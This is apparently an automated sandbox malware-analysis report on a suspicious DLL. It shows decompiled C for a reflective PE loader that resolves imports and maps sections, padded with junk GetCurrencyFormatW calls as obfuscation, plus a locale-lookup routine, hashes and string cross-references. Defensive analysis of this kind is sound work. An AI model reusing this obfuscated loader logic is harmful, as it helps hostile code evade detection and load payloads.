eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10003143, 10003148, 10003166, 10003183, 100031B8, 100031C8, 100031EF, 10003215, 1000323D, 100032B0, 100032C4, 100032EF, 10003308, 10003332, 1000335D, 10003395, 100033B7, 100033E5, 100033FB, 1000340E, 10003421, 10003434, 1000345F, 10003478, 100034AB, 100034C3, 100034E7, 10003512, 10003538

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat$malloc
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3897936752-3161301136
Opcode ID: ad4306dd0e1101c6acc404a6b929437f6ac9df0eb58d4d58c0bece070a968090
Instruction ID: 34db2b080b93b1a5fa06b343cb693385c3cc97db3aa9a73273c3b7a7a01e4154
Opcode Fuzzy Hash: ad4306dd0e1101c6acc404a6b929437f6ac9df0eb58d4d58c0bece070a968090
Instruction Fuzzy Hash: 95C14670604214BFE208DB51CD96F5BBBECEB8A789F01480EF7459B2A2C731E9148F65

Uniqueness

Uniqueness Score: -1.00%

Function 10002BDE Relevance: 52.9, APIs: 28, Strings: 2, Instructions: 381
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E10002BDE(intOrPtr* _a4) {
				int _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int* _v20;
				void* _v24;
				signed int _t121;
				signed int _t144;
				void* _t156;
				intOrPtr _t157;
				void* _t178;
				signed int _t184;
				intOrPtr _t189;
				intOrPtr _t192;
				short* _t218;
				intOrPtr _t246;
				intOrPtr* _t247;
				int _t256;
				void** _t257;

				_t257 =  &_v24;
				_t256 = 0x22b9;
				_t218 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v16 =  *((intOrPtr*)(_a4 + 4));
				_v4 = 1;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v8;
				_t121 =  *_a4 + 0x80 + (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v8) * 8;
				_v8 = _t121;
				if( *((intOrPtr*)(_t121 + 4)) != 0) {
					_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 * 0x14;
					_v24 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 +  *_v8 + _v12 + _v16;
					L20:
					while(IsBadHugeReadPtr(_v24, GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440dc + 0x14) == 0) {
						if(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0xc)) == 0) {
							L26:
							return _v4;
						}
						_t144 =  *((intOrPtr*)(_a4 + 0x24))(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0xc)) + _v16,  *((intOrPtr*)(_a4 + 0x34)));
						_v8 = _t144;
						if(_t144 == 0) {
							_v4 = 0;
							goto L26;
						}
						_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440cc +  *((intOrPtr*)(_a4 + 0xc)) + 1;
						_v12 = realloc( *(_a4 + 8), (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d0 + 4) * _v12);
						_t156 = _v12 + GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440e0 * 4;
						if(_t156 == 0) {
							_t157 = _a4;
							 *((intOrPtr*)(_t157 + 0x2c))(_v8,  *((intOrPtr*)(_t157 + 0x34)));
							_v4 = _v4 & 0x00000000;
							L25:
							goto L26;
						}
						_t256 = 0x22b9;
						 *(_a4 + 8) = _t156;
						 *((intOrPtr*)( *(_a4 + 8) + (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_a4 + 0xc))) * 4)) = _v8;
						 *((intOrPtr*)(_a4 + 0xc)) =  *((intOrPtr*)(_a4 + 0xc)) + 1;
						_push(0x22b9);
						_push(L"xadqsavcbdfewescGADW");
						_push(0);
						_push(_t218);
						_push(0x11d4);
						_push(0);
						if( *_v24 == 0) {
							_v12 = GetCurrencyFormatW() *  *0x100440e0 << 2;
							_v20 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0x10)) + _v12 + _v16;
							_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc << 2;
							_t178 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0x10)) + _v12;
						} else {
							_v12 = GetCurrencyFormatW() *  *0x100440d0 << 2;
							_v20 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *_v24 + _v12 + _v16;
							_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 << 2;
							_t178 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x10)) + _v12;
						}
						_v12 = _t178 + _v16;
						while( *_v20 != 0) {
							if(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440e0 + ( *_v20 >> 0x1f) == 0) {
								_t184 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_t246 = _a4;
								_t189 =  *((intOrPtr*)(_t246 + 0x28))(_v8, _t184 *  *0x100440e0 + _v16 +  *_v20 + 2,  *((intOrPtr*)(_t246 + 0x34)));
							} else {
								_t189 =  *((intOrPtr*)(_a4 + 0x28))(_v8, GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d0 + ( *_v20 & 0x0000ffff),  *((intOrPtr*)(_a4 + 0x34)));
							}
							_t247 = _v12;
							 *_t247 = _t189;
							_t257 =  &(_t257[3]);
							if( *_t247 == 0) {
								_v4 = 0;
								L18:
								if(_v4 == 0) {
									_t192 = _a4;
									 *((intOrPtr*)(_t192 + 0x2c))(_v8,  *((intOrPtr*)(_t192 + 0x34)));
									goto L25;
								}
								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v24 = _v24 + 0x14;
								goto L20;
							} else {
								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v20 =  &(_v20[1]);
								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v12 = _v12 + 4;
								continue;
							}
						}
						goto L18;
					}
					goto L26;
				}
				return 1;
			}

0x10002bde
0x10002bf2
0x10002bff
0x10002c0d
0x10002c11
0x10002c2e
0x10002c4b
0x10002c62
0x10002c6e
0x10002c72
0x10002c9e
0x10002cb9
0x00000000
0x10002fc9
0x10002cde
0x10003021
0x00000000
0x10003021
0x10002d10
0x10002d19
0x10002d1d
0x10002ff6
0x00000000
0x10002ff6
0x10002d4d
0x10002d7e
0x10002d8f
0x10002d94
0x10002ffc
0x10003007
0x1000300a
0x1000301f
0x00000000
0x10003020
0x10002d9e
0x10002daf
0x10002dcb
0x10002dd2
0x10002dd9
0x10002dda
0x10002de3
0x10002de4
0x10002de5
0x10002de6
0x10002de7
0x10002e76
0x10002e9e
0x10002eba
0x10002ece
0x10002de9
0x10002e01
0x10002e28
0x10002e44
0x10002e58
0x10002e58
0x10002ed6
0x10002f9d
0x10002eff
0x10002f45
0x10002f58
0x10002f67
0x10002f01
0x10002f34
0x10002f34
0x10002f6a
0x10002f6e
0x10002f72
0x10002f77
0x10002fac
0x10002fb0
0x10002fb6
0x10003011
0x1000301c
0x00000000
0x1000301c
0x10002fc2
0x10002fc4
0x00000000
0x10002f79
0x10002f83
0x10002f85
0x10002f96
0x10002f98
0x00000000
0x10002f98
0x10002f77
0x00000000
0x10002faa
0x00000000
0x10002ff4
0x00000000

APIs

GetCurrencyFormatW.KERNEL32 ref: 10002C19
GetCurrencyFormatW.KERNEL32 ref: 10002C32
GetCurrencyFormatW.KERNEL32 ref: 10002C4F
GetCurrencyFormatW.KERNEL32 ref: 10002C86
GetCurrencyFormatW.KERNEL32 ref: 10002CA2
GetCurrencyFormatW.KERNEL32 ref: 10002FD5
IsBadHugeReadPtr.KERNEL32(000022B9,-00000014), ref: 10002FE6

Strings

xadqsavcbdfewescGADW, xrefs: 10002BF8, 10002C23, 10002C40, 10002C7D, 10002C93, 10002CC3, 10002CEC, 10002D24, 10002D3E, 10002D73, 10002DA4, 10002DDA, 10002DF3, 10002E19, 10002E36, 10002E68, 10002E8F, 10002EAC, 10002EE0, 10002F09, 10002F3A, 10002F7A, 10002F8B, 10002FB9, 10002FCA
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10002BE9, 10002BFF, 10002C04, 10002C2A, 10002C47, 10002C83, 10002C9A, 10002CCA, 10002CF3, 10002D2A, 10002D45, 10002D7A, 10002DAB, 10002DE4, 10002DFA, 10002E24, 10002E3D, 10002E6F, 10002E9A, 10002EB3, 10002EE7, 10002F10, 10002F41, 10002F80, 10002F92, 10002FBF, 10002FD1

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat$HugeRead
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 393575760-3161301136
Opcode ID: d104fe54fbad355bcebe88f005ab9aa9ac17f58dad5190f15827009be6e713bf
Instruction ID: ead797fee4320dd8a6b32923dbdec08024b9b474de8a2ec407594d38246e10a8
Opcode Fuzzy Hash: d104fe54fbad355bcebe88f005ab9aa9ac17f58dad5190f15827009be6e713bf
Instruction Fuzzy Hash: 15D15971508205AFE304DF60CD96F6BBBE8EB8A788F11581DF6459B292C732E914CF25

Uniqueness

Uniqueness Score: -1.00%

Function 10001E51 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 314
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001E51(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v4;
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr* _v20;
				int _t93;
				signed int _t94;
				signed int _t108;
				intOrPtr* _t109;
				void* _t113;
				void* _t147;
				short* _t160;
				signed int _t187;
				short* _t194;
				void* _t195;
				void* _t196;
				void* _t197;

				_t195 =  &_v20;
				_t194 = L"xadqsavcbdfewescGADW";
				_t160 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v12 =  *((intOrPtr*)(_a16 + 4));
				_v4 =  *(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 * 0xf8 +  *_a16 + 0x14) & 0x0000ffff;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc * 0x28 + _v4;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 + _v4 +  *_a16 + 0x18;
				_v8 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + ( *( *_a16 + 6) & 0x0000ffff) <= 0) {
					L11:
					return 1;
				}
				_v20 = _v4 + 0x10;
				do {
					_t93 = 0;
					if( *_v20 != 0) {
						_t94 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9);
						if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + _a8, _t94 *  *0x100440d0 +  *_v20 +  *((intOrPtr*)(_v20 + 4))) == 0) {
							L13:
							return 0;
						}
						_t108 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9);
						_t109 = _v20;
						_t113 =  *((intOrPtr*)(_a16 + 0x1c))( *((intOrPtr*)(_t109 - 4)) + _v12, _t108 *  *0x100440d8 +  *_t109, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + 4,  *((intOrPtr*)(_a16 + 0x34)));
						_t196 = _t195 + 0x14;
						if(_t113 == 0) {
							goto L13;
						}
						_v16 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d8 +  *((intOrPtr*)(_v20 - 4)) + _v12;
						memcpy(_v16,  *((intOrPtr*)(_v20 + 4)) + _a4, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc +  *_v20);
						_t195 = _t196 + 0xc;
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d8 - 0x00000001 & _v16;
						 *(_v20 - 8) = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d4 + _v4;
						L9:
						_t93 = 0;
						goto L10;
					}
					_t187 =  *((intOrPtr*)(_a12 + 0x38));
					_v4 = _t187;
					if(_t187 <= 0) {
						goto L10;
					}
					_t147 =  *((intOrPtr*)(_a16 + 0x1c))(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v20 - 4)) + _v12, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + _v4, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440dc + 4,  *((intOrPtr*)(_a16 + 0x34)));
					_t197 = _t195 + 0x14;
					if(_t147 == 0) {
						goto L13;
					}
					_v16 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 - 4)) + _v12;
					 *(_v20 - 8) = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 - 0x00000001 & _v16;
					memset(_v16, 0, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d4 + _v4);
					_t195 = _t197 + 0xc;
					goto L9;
					L10:
					_v8 = _v8 + 1;
					_v20 = _v20 + 0x28;
				} while (_v8 < GetCurrencyFormatW(_t93, 0x11d4, _t160, _t93, _t194, 0x22b9) *  *0x100440d0 + ( *( *_a16 + 6) & 0x0000ffff));
				goto L11;
			}

0x10001e51
0x10001e6a
0x10001e72
0x10001e80
0x10001eaa
0x10001eca
0x10001eeb
0x10001ef5
0x10001f10
0x100021bf
0x00000000
0x100021c1
0x10001f1d
0x10001f21
0x10001f25
0x10001f29
0x10002045
0x1000207d
0x100021ca
0x00000000
0x100021ca
0x100020ca
0x100020d5
0x100020e8
0x100020eb
0x100020f0
0x00000000
0x00000000
0x10002122
0x10002144
0x1000214a
0x10002173
0x10002188
0x1000218b
0x1000218b
0x00000000
0x1000218b
0x10001f33
0x10001f38
0x10001f3c
0x00000000
0x00000000
0x10001fba
0x10001fbd
0x10001fc2
0x00000000
0x00000000
0x10001ff4
0x10002016
0x1000202d
0x10002033
0x00000000
0x1000218d
0x1000218d
0x10002191
0x100021b5
0x00000000

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001E84
GetCurrencyFormatW.KERNEL32 ref: 10001EAE
GetCurrencyFormatW.KERNEL32 ref: 10001ECE
GetCurrencyFormatW.KERNEL32 ref: 10001EF9
GetCurrencyFormatW.KERNEL32 ref: 10001F53
GetCurrencyFormatW.KERNEL32 ref: 10001F6C
GetCurrencyFormatW.KERNEL32 ref: 10001F87
GetCurrencyFormatW.KERNEL32 ref: 10001FA1
GetCurrencyFormatW.KERNEL32 ref: 10001FD4
GetCurrencyFormatW.KERNEL32 ref: 10001FF8
GetCurrencyFormatW.KERNEL32 ref: 10002019
memset.MSVCRT ref: 1000202D
GetCurrencyFormatW.KERNEL32 ref: 10002045
GetCurrencyFormatW.KERNEL32 ref: 10002066
GetCurrencyFormatW.KERNEL32 ref: 10002096
GetCurrencyFormatW.KERNEL32 ref: 100020AF
GetCurrencyFormatW.KERNEL32 ref: 100020CA
GetCurrencyFormatW.KERNEL32 ref: 10002102
GetCurrencyFormatW.KERNEL32 ref: 10002126
memcpy.MSVCRT ref: 10002144
GetCurrencyFormatW.KERNEL32 ref: 100021A0

Strings

xadqsavcbdfewescGADW, xrefs: 10001E6A, 10001E6F, 10001EA3, 10001EC3, 10001EEA, 10001F4E, 10001F65, 10001F80, 10001F9A, 10001FCD, 10001FED, 1000200A, 10002040, 1000205F, 1000208F, 100020A8, 100020C3, 100020FB, 1000211B, 10002152, 10002167, 1000219B
(, xrefs: 10002191
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001E5C, 10001E72, 10001E77, 10001EA6, 10001EC6, 10001EF2, 10001F50, 10001F68, 10001F83, 10001F9D, 10001FD0, 10001FF0, 1000200D, 10002042, 10002062, 10002092, 100020AB, 100020C6, 100020FE, 1000211E, 10002155, 1000216A, 1000219D

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat$memcpymemset
String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 2888895459-2712681272
Opcode ID: 3e584bf575076d2f861363e2cb4f4e983203ccea50c86de04f033ec7f5290706
Instruction ID: 346e2bfed80208adbbea8c92dee40ae63694b643ed2e5d5183bbf84c561662e4
Opcode Fuzzy Hash: 3e584bf575076d2f861363e2cb4f4e983203ccea50c86de04f033ec7f5290706
Instruction Fuzzy Hash: B1A159B1644344BFE208DB95CD86F2BBBECEB8AB48F011419F745DB2D1C671E9108B65

Uniqueness

Uniqueness Score: -1.00%

Function 10005EFE Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10005EFE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x10045580; // 0xe155dca3
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E1001FBC4(E10032F92, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E100056C3, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E10021022( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E10020F40(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E100056D9(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E10005789(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E100057BF(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E10005DB0(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E10005CE3(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E1001FBB5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

0x10005efe
0x10005eff
0x10005f05
0x10005f09
0x10005f10
0x10005f16
0x10005f1d
0x10005f2e
0x10005f35
0x10005f38
0x10005f3b
0x10005f3e
0x10005f4c
0x10005f4f
0x10005f53
0x10006021
0x100060dd
0x100060e1
0x100060f5
0x100060f8
0x10006102
0x10006108
0x10006120
0x1000612c
0x10006131
0x10006134
0x10006134
0x10006102
0x10006027
0x1000603b
0x10006046
0x1000605c
0x1000606b
0x10006083
0x10006088
0x1000608e
0x1000609a
0x1000609d
0x100060af
0x100060bb
0x100060c0
0x100060c3
0x100060c3
0x1000608e
0x100060cd
0x100060cd
0x10006046
0x10005f59
0x10005f61
0x10005f64
0x10005f67
0x10005f79
0x10005f82
0x10005f8a
0x10005f97
0x10005f9a
0x10005fa1
0x10005fa5
0x10005fa9
0x10005fac
0x10005faf
0x10005fbc
0x10005fc8
0x10005fcd
0x10005fd0
0x10005fd0
0x10005fd7
0x10005fd7
0x10005fdc
0x10005fdf
0x10005ff6
0x10005ffd
0x1000600c
0x10006142
0x10006149
0x10006159
0x1000615c
0x1000615f
0x10006166
0x10006169
0x10006170
0x1000617c
0x10006186
0x1000618b
0x1000618b
0x10006190
0x10006195
0x100061b2
0x100061b2
0x100061b9
0x100061be
0x00000000
0x10006197
0x10006197
0x1000619e
0x100061a6
0x00000000
0x00000000
0x100061a8
0x100061ac
0x00000000
0x00000000
0x00000000
0x100061ae
0x100061b0
0x00000000
0x100061b0
0x10006012
0x10006012
0x100061c0
0x100061c3
0x100061cb
0x100061cc
0x100061cd
0x100061e2
0x100061e2

APIs

__EH_prolog3.LIBCMT ref: 10005F1D
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10005F3E
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10005F4F
ConvertDefaultLocale.KERNEL32(?), ref: 10005F85
